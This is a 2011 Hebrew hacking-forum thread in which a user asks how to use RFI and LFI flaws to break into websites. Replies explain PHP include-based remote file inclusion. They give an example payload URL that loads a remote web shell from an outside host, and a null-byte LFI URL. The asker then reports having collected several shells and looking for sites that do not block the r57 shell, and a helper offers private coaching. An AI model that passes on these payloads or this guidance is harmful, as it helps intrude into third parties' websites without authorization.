Rfi & Lfi & Shell Injection מה המטרה כאן בעצם?

**OverPowered** · 22-01-2011, 22:19

*אני לא מאמין שמישהו כאן יוכל לענות לי, אז רק מי שבאמת מבין שיכתוב אין לי זמן וכוח לבולשיט

אז ככה,
קראתי לעומק מאמרים על RFI וLFI וגם על SHELL .
אני כרגע יותר מעוניין להבין מה בעצם המטרה של LFI וRFI
קראתי ובדקתי על אתרים ולא הצלחתי להבין וגם לא הצלחתי לעשות שום דבר עם זה.
הRFI הוא בעצם כלי על מנת לספק לי את הקובץ PHP ואת מה שכתוב בתוכו?
כאילו את ה"קוד מקור" שלו?

לא הבנתי בכלל מה המטרה של הפירצות האלו, ואיך אני אמור רלהשיג ולהכנס איתם למסדי נתונים ולקבצים ולFTP.

אם אפשר הסבר קצר, ואולי אתר או שניים להתאמן עליהם.

כרגע לפי מה שקראתי אפשר לנסות את הפירצות האלה רק על אתרים שיש בהם סיומת =page?
כאילו
www.test.com/index.html?page=13
ואז אני מחדיר http://www.test.com/index.html?page=...m/login.php%00 כאן נתתי דוגמא לNULL שזה בעצם %00
אבל קראתי והבנתי שיש עוד הרבה וזה רק ההתחלה

בקיצור לא הבנתי בכלל על מה כל זה, ומה אני אמור להשיג מזה ואיך בעצם בדוגרי של הדוגרי לפרוץ בעזרת הכלים האלה.

תודה לעוזרים!

**.EffecT** · 23-01-2011, 15:58

נכתב במקור על ידי Brod`

*אני לא מאמין שמישהו כאן יוכל לענות לי, אז רק מי שבאמת מבין שיכתוב אין לי זמן וכוח לבולשיט

אז ככה,
קראתי לעומק מאמרים על RFI וLFI וגם על SHELL .
אני כרגע יותר מעוניין להבין מה בעצם המטרה של LFI וRFI
קראתי ובדקתי על אתרים ולא הצלחתי להבין וגם לא הצלחתי לעשות שום דבר עם זה.
הRFI הוא בעצם כלי על מנת לספק לי את הקובץ PHP ואת מה שכתוב בתוכו?
כאילו את ה"קוד מקור" שלו?

לא הבנתי בכלל מה המטרה של הפירצות האלו, ואיך אני אמור רלהשיג ולהכנס איתם למסדי נתונים ולקבצים ולFTP.

אם אפשר הסבר קצר, ואולי אתר או שניים להתאמן עליהם.

כרגע לפי מה שקראתי אפשר לנסות את הפירצות האלה רק על אתרים שיש בהם סיומת =page?
כאילו
www.test.com/index.html?page=13
ואז אני מחדיר http://www.test.com/index.html?page=...m/login.php%00 כאן נתתי דוגמא לNULL שזה בעצם %00
אבל קראתי והבנתי שיש עוד הרבה וזה רק ההתחלה

בקיצור לא הבנתי בכלל על מה כל זה, ומה אני אמור להשיג מזה ואיך בעצם בדוגרי של הדוגרי לפרוץ בעזרת הכלים האלה.

תודה לעוזרים!

דווקא לא רק על אתרים שיש בהם =page
קח:
http://www.iatraf.co.il/showthread.php?t=704050

**ne0** · 23-01-2011, 16:41

במילים אחרות ? אתה יכול לקרוא לזה Php Injection .
מה שאתה בעצם עושה במתקפה זו הוא שאתה בעצם משתמש ב Include כאשר יש קובץ כלשהו.

קוד:

<?php include ("ne0.php");require ("ne0.php");?>

הקובץ מיבא את הדף הנלקח ( Ne0.php).

אוקיי עכשיו קח לדוגמא אתר שמייצג תוכנה כלשהי ,
כמובן שבאתר הזה תמצא דף של הורדת התוכנה .
לדוגמא :

קוד PHP:


Ne0-software.com/index.php?page=download.php

מה בעצם מתרחש בדף זה ?
הקובץ

DOWNLOAD.PHP

מיובא בעצם , על ידי שימוש במשתנה Page.

כאן בא החלק המעניין ,
כעת , במקום שנכנס להורדה עצמה של התוכנה ( Ne0 Software )
אנחנו נקרא קובץ משלנו - ברוב המקרים הקובץ יהיה זדוני ( בכל זאת אתה רוצה גישה למערכת )
( שאל ) .
אז איך עושים זאת ?
כך :

קוד PHP:


Ne0-software.com/index.php?page=www.shell.com/shell-number.txt

כאשר אתה מייצג את שם השאל ומספרו.
( השאל חייב להיות מיובא בקובץ TXT).

מכאן , אני בטוח שתדע מה לעשות .

דרך צלחה ידידי

**Blackmarket50** · 23-01-2011, 17:34

באמת גם אני לא הבנתי איך לעלות שאלל לדוגמה לפורום

**OverPowered** · 23-01-2011, 18:37

Hackerxd אני פרסמתי את האשכול על ה׳sqli6 ואלה תחומים שונים לגמרי
נאו מאוד עזרת לי, כרגע השגתי מספר שאאלים אבל הבעיה היחידה שלי היא שאני צריך לזהות אתרים פריצים שלא חסמו אתr57

**ne0** · 23-01-2011, 20:35

נכתב במקור על ידי Brod`

Hackerxd אני פרסמתי את האשכול על ה׳sqli6 ואלה תחומים שונים לגמרי
נאו מאוד עזרת לי, כרגע השגתי מספר שאאלים אבל הבעיה היחידה שלי היא שאני צריך לזהות אתרים פריצים שלא חסמו אתr57

במידה ויש לך מסנג'ר אשמח לעזור לך שם ,
כמו שאתה מבין אני תמיד שמח לעזור לאנשים שעוזרים לעצמם

**OverPowered** · 23-01-2011, 22:19

אין שום בעיה, אני אצור איתך קשר במסנג'ר

שם משתמש		זכור אותי	רישום לאתר
סיסמה		שכחת סיסמה?

קהילות פורומים, הורדות, יעוץ ותמיכה

אשכולות דומים

Command & Conquer Generals Zero Hou|2 LINK

[הורדה] SnowFox DVD &amp; Video Converter 2.9.0.0| היא מקצועית ALL-IN-למשתמשים מולטימדיה

[פרסום] לכל מי שבאמת רוצה ללמוד על shell\LFI\RFI

המטרה שלי בחיים...

[מכרז]חשבון Gold לסטים!כל המשחקים!לא מהשיטה של ‎Injection...פרטים בפנים!!

Rfi & Lfi & Shell Injection מה המטרה כאן בעצם?

כלי נושא